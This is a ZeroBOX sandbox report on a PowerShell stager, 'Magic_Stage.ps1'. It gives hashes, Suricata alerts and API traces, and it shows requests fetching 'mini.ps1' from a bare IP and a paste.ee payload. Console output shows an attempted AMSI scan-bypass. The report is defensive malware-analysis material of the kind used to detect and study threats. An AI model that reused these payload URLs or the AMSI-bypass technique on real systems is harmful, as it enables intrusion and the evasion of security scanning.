popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Magic_Stage.ps1

Generic Malware Antivirus .NET DLL DLL PE32 PE File
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6401 Sept. 18, 2023, 9:45 a.m. Sept. 18, 2023, 9:47 a.m.
Size 859.0B
Type ASCII text, with CRLF line terminators
MD5 3377b4e386b5ef09b80f96c3b121f9c8
SHA256 d295b2db5347e6873ef32f8db3663f601be989b67f6d743e100541ab80124d5b
CRC32 9B419D62
ssdeep 24:YcfpnFMCQgFwfqfpnFMLbfpnFMCQgA0f0FfpnFMCQgBwfn:YcfpEqfpkbfpJGfpJ+n
Yara None matched

Name Response Post-Analysis Lookup
paste.ee
A 104.21.84.67
A 172.67.187.200
104.21.84.67
IP Address Status Action
104.21.84.67 Active Moloch
164.124.101.2 Active Moloch
44.203.122.41 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.101:49162 -> 44.203.122.41:80 2032162 ET INFO PS1 Powershell File Request Potentially Bad Traffic
TCP 192.168.56.101:49174 -> 104.21.84.67:443 2034978 ET POLICY Pastebin-style Service (paste .ee) in TLS SNI Potential Corporate Privacy Violation
TCP 192.168.56.101:49174 -> 104.21.84.67:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined

Suricata TLS

Flow Issuer Subject Fingerprint
TLSv1
192.168.56.101:49174
104.21.84.67:443 		C=US, O=Google Trust Services LLC, CN=GTS CA 1P5 CN=paste.ee cd:77:4c:26:1f:f8:63:15:43:5a:ba:aa:11:f1:e7:1a:23:3e:4b:15

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: AMSI providers' scan interception
console_handle: 0x0000001f
1 1 0

WriteConsoleW

 buffer: -- Maor Korkos (@maorkor)
console_handle: 0x0000002f
1 1 0

WriteConsoleW

 buffer: -- 64bit implemetation
console_handle: 0x0000003f
1 1 0

WriteConsoleW

 buffer: Exception calling "AmsiInitialize" with "2" argument(s): "Unable to load DLL 'a
console_handle: 0x00000023
1 1 0

WriteConsoleW

 buffer: msi': The specified module could not be found. (Exception from HRESULT: 0x80070
console_handle: 0x0000002f
1 1 0

WriteConsoleW

 buffer: 07E)"
console_handle: 0x0000003b
1 1 0

WriteConsoleW

 buffer: At line:22 char:23
console_handle: 0x00000047
1 1 0

WriteConsoleW

 buffer: + [Apis]::AmsiInitialize <<<< ("MyScanner", [ref]$ctx)
console_handle: 0x00000053
1 1 0

WriteConsoleW

 buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
console_handle: 0x0000005f
1 1 0

WriteConsoleW

 buffer: + FullyQualifiedErrorId : DotNetMethodException
console_handle: 0x0000006b
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x04ff6530
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x04ff6530
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x04ff6530
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x04ff6530
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x04ff6530
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x04ff6530
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004ae710
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004b6de0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004b6e60
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004b6ea0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004b6ee0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004b6de0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004b6de0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004b6de0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004b6de0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004b6de0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004b6de0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004b6de0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004b6de0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004b6de0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004b6de0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004b6de0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004b6de0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004b6de0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004b6de0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004b6de0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004b6de0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004b6de0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004b6de0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004b6de0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004b6de0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004b6de0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004b6de0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004b6de0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004b6de0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004b6de0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004b6de0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004b6de0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004b6de0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004b6de0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004b6de0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004b6de0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004b6de0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004b6de0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004b6de0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004b6de0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004b6de0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004b6de0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004b6de0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004b6de0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
Time & API Arguments Status Return Repeated

__exception__

 stacktrace: 
ND_RI8+0xa7 ND_WI2-0x25 mscoree+0x1a36a @ 0x741ca36a
0x55613e9
system+0x131c68 @ 0x70b21c68
system+0x1318d0 @ 0x70b218d0
system+0x13136d @ 0x70b2136d
system+0x131277 @ 0x70b21277
system+0x130fda @ 0x70b20fda
system+0x130f91 @ 0x70b20f91
system+0x130a6f @ 0x70b20a6f
system+0x13091e @ 0x70b2091e
system+0x14c562 @ 0x70b3c562
system+0x19a8c2 @ 0x70b8a8c2
system+0x19a79e @ 0x70b8a79e
system+0x134ff1 @ 0x70b24ff1
system+0x4e97e7 @ 0x70ed97e7
microsoft+0x1214db @ 0x705b14db
system+0x152388 @ 0x70b42388
system+0x1a11a0 @ 0x70b911a0
system+0x18cfe5 @ 0x70b7cfe5
system+0x1984cd @ 0x70b884cd
system+0x193baf @ 0x70b83baf
system+0x19ac03 @ 0x70b8ac03
system+0x19a884 @ 0x70b8a884
system+0x19a79e @ 0x70b8a79e
system+0x134ff1 @ 0x70b24ff1
system+0x4e97e7 @ 0x70ed97e7
microsoft+0x1214db @ 0x705b14db
system+0x152388 @ 0x70b42388
system+0x1a11a0 @ 0x70b911a0
system+0x18cfe5 @ 0x70b7cfe5
system+0x1984cd @ 0x70b884cd
system+0x193baf @ 0x70b83baf
system+0x19ac03 @ 0x70b8ac03
system+0x19a884 @ 0x70b8a884
system+0x19a79e @ 0x70b8a79e
system+0x19a6b1 @ 0x70b8a6b1
system+0x19a4bf @ 0x70b8a4bf
system+0x198a79 @ 0x70b88a79
system+0x19861c @ 0x70b8861c
system+0x18d1fe @ 0x70b7d1fe
system+0x193c2f @ 0x70b83c2f
system+0x193b12 @ 0x70b83b12
system+0x18fe09 @ 0x70b7fe09
system+0x18f8c7 @ 0x70b7f8c7
mscorlib+0x216e76 @ 0x71fa6e76
mscorlib+0x2202ff @ 0x71fb02ff
mscorlib+0x216df4 @ 0x71fa6df4
CoUninitializeEE-0x29870 mscorwks+0x1b4c @ 0x72891b4c
CoUninitializeEE-0x125de mscorwks+0x18dde @ 0x728a8dde
CoUninitializeEE-0x4990 mscorwks+0x26a2c @ 0x728b6a2c
CoUninitializeEE-0x495d mscorwks+0x26a5f @ 0x728b6a5f
CoUninitializeEE-0x493f mscorwks+0x26a7d @ 0x728b6a7d
DllRegisterServerInternal+0x4cf2b GetPrivateContextsPerfCounters-0xa76e mscorwks+0xa3191 @ 0x72933191
CreateAssemblyNameObject+0xb7ec DllRegisterServerInternal-0x4937 mscorwks+0x5192f @ 0x728e192f
CreateAssemblyNameObject+0xb788 DllRegisterServerInternal-0x499b mscorwks+0x518cb @ 0x728e18cb
CreateAssemblyNameObject+0xb6ae DllRegisterServerInternal-0x4a75 mscorwks+0x517f1 @ 0x728e17f1
CreateAssemblyNameObject+0xb83a DllRegisterServerInternal-0x48e9 mscorwks+0x5197d @ 0x728e197d
DllRegisterServerInternal+0x4ccfc GetPrivateContextsPerfCounters-0xa99d mscorwks+0xa2f62 @ 0x72932f62
DllRegisterServerInternal+0x4cdd6 GetPrivateContextsPerfCounters-0xa8c3 mscorwks+0xa303c @ 0x7293303c
GetMetaDataInternalInterface+0xcf27 _CorDllMain-0x9ae mscorwks+0x16805a @ 0x729f805a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 04 11 8b 54 11 04 5d c2 08 00 55 8b ec 8b 4d
exception.instruction: mov eax, dword ptr [ecx + edx]
exception.exception_code: 0xc0000005
exception.symbol: ND_RI8+0x9 ND_WI2-0xb mscoreei+0x2175a
exception.address: 0x7332175a
registers.esp: 102230808
registers.edi: 49039436
registers.eax: 1932662609
registers.ebp: 102230808
registers.edx: 16
registers.ebx: 8310712
registers.esi: 1968968226
registers.ecx: 0
1 0 0
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://44.203.122.41/mini.ps1
suspicious_features GET method with no useragent header suspicious_request GET https://paste.ee/r/AqqN6/0
request GET http://44.203.122.41/mini.ps1
request GET https://paste.ee/r/AqqN6/0
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 2540
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x025db000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2540
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x025ef000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2540
region_size: 327680
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef40000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2540
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef40000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2540
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef40000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2540
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef30000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2540
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef30000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2540
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x021f9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2540
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05750000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2540
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a92000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2540
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x025e9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2540
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06330000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2540
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06331000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2540
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05576000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2540
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05577000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2540
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05578000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2540
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05579000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2540
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0557a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2540
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x021fa000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2540
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a93000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2540
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05751000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2540
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06332000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2540
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a94000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2540
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06333000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2540
region_size: 1638400
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06880000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2540
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x069d0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2540
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x069d1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2540
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x069d2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2540
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x069d3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2540
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06334000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2540
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06335000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2540
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06336000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2540
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06337000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2540
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x021fd000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2540
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05561000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2540
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06338000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2712
region_size: 1703936
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01f10000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2712
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02070000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2804
region_size: 1507328
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01e80000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2804
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01fb0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file c:\Users\test22\AppData\Local\Temp\afgz_pv1.dll
file c:\Users\test22\AppData\Local\Temp\9mrxduhn.dll
file C:\Users\test22\AppData\Local\Temp\9mrxduhn.dll
file C:\Users\test22\AppData\Local\Temp\afgz_pv1.dll
ESET-NOD32 PowerShell/Obfuscated.AF
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

 flags: 15
family: 0
111 0
Data received HTTP/1.1 200 OK Date: Mon, 18 Sep 2023 00:45:14 GMT Server: Apache/2.4.55 (Win64) OpenSSL/1.1.1s Upgrade: h2,h2c Connection: Upgrade, Keep-Alive Last-Modified: Mon, 24 Jul 2023 13:07:36 GMT ETag: "264-6013b4c607aeb" Accept-Ranges: bytes Content-Length: 612 Keep-Alive: timeout=5, max=100 Add-Type -TypeDefinition @" using System; using System.Runtime.InteropServices; public class Win32 { [DllImport("user32.dll")] public static extern void keybd_event(byte bVk, byte bScan, uint dwFlags, int dwExtraInfo); } "@ # Define VK_WIN constant $VK_WIN = 0x5B # Define VK_D constant $VK_D = 0x44 # Define KEYEVENTF_KEYUP constant $KEYEVENTF_KEYUP = 0x0002 # Press Win+D [Win32]::keybd_event($VK_WIN, 0, 0, 0) [Win32]::keybd_event($VK_D, 0, 0, 0) # Release Win+D [Win32]::keybd_event($VK_D, 0, $KEYEVENTF_KEYUP, 0) [Win32]::keybd_event($VK_WIN, 0, $KEYEVENTF_KEYUP, 0)
Data received [
Data received We›·…W—»N½ôOÚ³¤ªUcAàMNDOWNGRD Ö|!¢)Z+âðÛì ¾ê?—ï£KÒz]ÈÀÿ 
Data received k
Data received K
Data received GAº\àS HW>‘c…ªâûñŒs[ Û­ž×èUĸ99Âƅò@q“ÖŸù2ÛJu…žq+6ün…û…(ù˜ ×êºåÆÈ흐¸¯œ üÍü*Îéoä¡C›mª•Ã3woA°#ß³¹ÎYiD–û¶m‘*f"iò?±F ¨hýŒ+ÌjBÎÛ>ٓÑËHI’cÇ- |Œ}ÌÜ]bé’û(jËî¼» “\”XE`¹a°/I)ŸS1ŸVÇ úš'àß«FëÏ×[¾xú¬˜Šâ#Æ*âë`à\c~ý®„å˜= Óº$¦š~øD:ªi³ ¹pº+n֙*Jã¡ áí6µsÍ ùÁڂ®s[Ü_¦™@v6„òØ2ݞ‚™©ä¨í»2à5Œ ‰¶=ct,2ƒ
Data received 
Data received 
Data received 
Data received 
Data received 0
Data received ÿ» ÌüŒTů pVŠÇo¤?‡X`J—š$ÈÒI¬»'ÓRG×äªDòàUiœ£g
Data received p
